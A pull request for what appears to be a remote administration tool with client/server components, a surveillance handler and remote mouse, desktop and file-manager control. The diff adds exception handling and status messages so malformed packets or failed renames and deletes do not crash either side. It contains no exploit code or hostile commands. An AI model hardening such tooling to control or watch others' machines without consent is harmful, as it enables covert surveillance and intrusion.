### PR TITLE
Reliability and Behavior Improvements

### DIFF
--- a/Client/Core/Commands/FileHandler.cs
+++ b/Client/Core/Commands/FileHandler.cs
@@ -166,11 +166,14 @@ namespace xClient.Core.Commands
                         new Packets.ClientPackets.SetStatusFileManager("Deleted file", false).Execute(client);
                         break;
                 }
-
-                HandleGetDirectory(new Packets.ServerPackets.GetDirectory(Path.GetDirectoryName(command.Path)), client);
             }
             catch
             {
+                new Packets.ClientPackets.SetStatus("Unable to delete path:" + command.Path).Execute(client);
+            }
+            finally
+            {
+                HandleGetDirectory(new Packets.ServerPackets.GetDirectory(Path.GetDirectoryName(command.Path)), client);
             }
         }
 
@@ -189,11 +192,14 @@ namespace xClient.Core.Commands
                         new Packets.ClientPackets.SetStatusFileManager("Renamed file", false).Execute(client);
                         break;
                 }
-
-                HandleGetDirectory(new Packets.ServerPackets.GetDirectory(Path.GetDirectoryName(command.NewPath)), client);
             }
             catch
             {
+                new Packets.ClientPackets.SetStatus("Unable to rename path:" + command.Path).Execute(client);
+            }
+            finally
+            {
+                HandleGetDirectory(new Packets.ServerPackets.GetDirectory(Path.GetDirectoryName(command.NewPath)), client);
             }
         }
     }

--- a/Client/Core/Commands/SurveillanceHandler.cs
+++ b/Client/Core/Commands/SurveillanceHandler.cs
@@ -90,7 +90,12 @@ namespace xClient.Core.Commands
                 {
                     if (desktopData != null)
                     {
-                        desktop.UnlockBits(desktopData);
+                        try
+                        {
+                            desktop.UnlockBits(desktopData);
+                        }
+                        catch
+                        { }
                     }
                     desktop.Dispose();
                 }
@@ -99,31 +104,36 @@ namespace xClient.Core.Commands
 
         public static void HandleDoMouseEvent(Packets.ServerPackets.DoMouseEvent command, Client client)
         {
-            Screen[] allScreens = Screen.AllScreens;
-            int offsetX = allScreens[command.MonitorIndex].Bounds.X;
-            int offsetY = allScreens[command.MonitorIndex].Bounds.Y;
-            Point p = new Point(command.X + offsetX, command.Y + offsetY);
-
-            switch (command.Action)
+            try
             {
-                case MouseAction.LeftDown:
-                case MouseAction.LeftUp:
-                    NativeMethodsHelper.DoMouseLeftClick(p, command.IsMouseDown);
-                    break;
-                case MouseAction.RightDown:
-                case MouseAction.RightUp:
-                    NativeMethodsHelper.DoMouseRightClick(p, command.IsMouseDown);
-                    break;
-                case MouseAction.MoveCursor:
-                    NativeMethodsHelper.DoMouseMove(p);
-                    break;
-                case MouseAction.ScrollDown:
-                    NativeMethodsHelper.DoMouseScroll(p, true);
-                    break;
-                case MouseAction.ScrollUp:
-                    NativeMethodsHelper.DoMouseScroll(p, false);
-                    break;
+                Screen[] allScreens = Screen.AllScreens;
+                int offsetX = allScreens[command.MonitorIndex].Bounds.X;
+                int offsetY = allScreens[command.MonitorIndex].Bounds.Y;
+                Point p = new Point(command.X + offsetX, command.Y + offsetY);
+
+                switch (command.Action)
+                {
+                    case MouseAction.LeftDown:
+                    case MouseAction.LeftUp:
+                        NativeMethodsHelper.DoMouseLeftClick(p, command.IsMouseDown);
+                        break;
+                    case MouseAction.RightDown:
+                    case MouseAction.RightUp:
+                        NativeMethodsHelper.DoMouseRightClick(p, command.IsMouseDown);
+                        break;
+                    case MouseAction.MoveCursor:
+                        NativeMethodsHelper.DoMouseMove(p);
+                        break;
+                    case MouseAction.ScrollDown:
+                        NativeMethodsHelper.DoMouseScroll(p, true);
+                        break;
+                    case MouseAction.ScrollUp:
+                        NativeMethodsHelper.DoMouseScroll(p, false);
+                        break;
+                }
             }
+            catch
+            { }
         }
 
         public static void HandleDoKeyboardEvent(Packets.ServerPackets.DoKeyboardEvent command, Client client)

--- a/Client/Core/Networking/Client.cs
+++ b/Client/Core/Networking/Client.cs
@@ -496,9 +496,20 @@ namespace xClient.Core.Networking
 
                                     using (MemoryStream deserialized = new MemoryStream(_payloadBuffer))
                                     {
-                                        IPacket packet = (IPacket)_serializer.Deserialize(deserialized);
+                                        try
+                                        {
+                                            IPacket packet = (IPacket)_serializer.Deserialize(deserialized);
 
-                                        OnClientRead(packet);
+                                            OnClientRead(packet);
+                                        }
+                                        catch (InvalidOperationException ex)
+                                        {
+                                            new Packets.ClientPackets.SetStatus("Unable to handle packet: " + ex.Message).Execute(this);
+                                        }
+                                        catch (Exception ex)
+                                        {
+                                            new Packets.ClientPackets.SetStatus("Invalid packet (is your client up to date?): " + ex.Message).Execute(this);
+                                        }
                                     }
 
                                     _receiveState = ReceiveType.Header;

--- a/Server/Core/Networking/Client.cs
+++ b/Server/Core/Networking/Client.cs
@@ -447,9 +447,20 @@ namespace xServer.Core.Networking
 
                                     using (MemoryStream deserialized = new MemoryStream(_payloadBuffer))
                                     {
-                                        IPacket packet = (IPacket)_serializer.Deserialize(deserialized);
+                                        try
+                                        {
+                                            IPacket packet = (IPacket)_serializer.Deserialize(deserialized);
 
-                                        OnClientRead(packet);
+                                            OnClientRead(packet);
+                                        }
+                                        catch (InvalidOperationException ex)
+                                        {
+                                            new Packets.ClientPackets.SetStatus("Unable to handle packet: " + ex.Message).Execute(this);
+                                        }
+                                        catch (Exception ex)
+                                        {
+                                            new Packets.ClientPackets.SetStatus("Invalid packet (is your client up to date?): " + ex.Message).Execute(this);
+                                        }
                                     }
 
                                     _receiveState = ReceiveType.Header;


### PR DESCRIPTION
<h1>Reasoning</h1>
Created a new branch for reliability because I intended to fix a larger amount of reliability issues. I was surprised to find that it is still so solid after all the changes in the past month. :100: 
<h1>Changes</h1>
1. Handle an inability to de-serialize a packet in a graceful manner (sets a status message of the situation).
    - If the server was unable to de-serialize a client's packet, it would crash (depending on the containing data types in the packet) due to an uncaught exception.
    - If the client was unable to de-serialize a packet from the server, it would crash (depending on the containing data types in the packet) due to an uncaught exception.
2. Added a few more try-catch blocks to some spots in the <code>CommandHandler</code>
    - Helps to make sure invalid packets from the server won't cause a crash.
    - Necessary because handlers in the <code>CommandHandler</code> aren't caught.
3. Slightly improved situations when the renaming or deleting of a file or directory failed.
    - Inform the server via a readable status message.
    - Always refresh the directory (even if the renaming or deleting of a file or directory failed).